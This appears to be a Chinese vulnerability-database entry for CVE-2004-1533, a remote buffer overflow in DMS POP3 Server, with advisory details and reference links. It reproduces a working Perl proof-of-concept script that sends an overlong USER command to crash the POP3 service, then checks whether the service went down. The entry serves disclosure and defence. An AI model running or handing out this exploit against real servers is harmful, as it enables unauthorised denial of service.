DMS POP3 Server远程缓冲区溢出漏洞

DMS POP3 Server远程缓冲区溢出漏洞

漏洞ID 1108287 漏洞类型 边界条件错误
发布时间 2004-11-21 更新时间 2005-10-20
图片[1]-DMS POP3 Server远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1533
图片[2]-DMS POP3 Server远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-465
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/644
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-465
|漏洞详情
DMSPOP3Server是一款基于POP3协议的服务程序。DMSPOP3Server对用户名长度缺少充分边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。在POP3验证过程中,提交包含超长用户名的数据,可发生缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
|漏洞EXP
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
#        DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => $ARGV[1],
				    Proto    => "TCP"))
{
	print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

	sleep(1);

	print $socket "USER " . "A" x 1023;

	close $socket;

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => $ARGV[1],
					    Proto    => "TCP"))
	{
		close $socket;

		print "failed!n";
	}
	else
	{
		print "successful!n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:$ARGV[1]n";
}

# milw0rm.com [2004-11-21]
|参考资料

来源:XF
名称:dms-pop3-username-bo(18161)
链接:http://xforce.iss.net/xforce/xfdb/18161
来源:BID
名称:11705
链接:http://www.securityfocus.com/bid/11705
来源:www.digitalmapping.sk.ca
链接:http://www.digitalmapping.sk.ca/pop3srv/Update.asp
来源:SECUNIA
名称:13248
链接:http://secunia.com/advisories/13248
来源:BUGTRAQ
名称:20041118BufferoverlowinDMSPOP3ServerforWindows2000/XP1.5.3build
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110081437508585&w;=2
来源:NSFOCUS
名称:7132
链接:http://www.nsfocus.net/vulndb/7132

相关推荐: Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) – ‘.IDC’ Path Mapping

Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) – ‘.IDC’ Path Mapping 漏洞ID 1053398 漏洞类型 发布时间 1999-06-04 更新时间 1999-06-04 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享